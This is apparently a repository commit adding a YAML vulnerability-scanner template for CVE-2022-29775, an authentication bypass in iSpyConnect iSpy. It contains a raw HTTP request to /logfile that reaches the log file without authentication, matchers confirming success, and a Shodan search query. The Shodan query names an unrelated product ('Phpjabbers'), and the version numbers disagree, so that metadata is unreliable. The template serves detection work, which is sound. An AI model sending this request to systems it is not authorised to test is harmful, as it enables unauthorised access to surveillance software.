Create CVE-2022-29775.yaml
parent
1c14ed2ae0
commit
09e231addd
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2022-29775
|
||||
|
||||
info:
|
||||
name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication.
|
||||
author: arafatansari
|
||||
severity: critical
|
||||
description: |
|
||||
iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29775
|
||||
- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
|
||||
metadata:
|
||||
shodan-query: http.html:"Phpjabbers"
|
||||
verified: true
|
||||
tags: improper,authentication,cve,2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /logfile?d=crossdomain.xml HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'Log File'
|
||||
- '<title>iSpy v7.2.1.0 Log File</title>'
|
Loading…
Reference in New Issue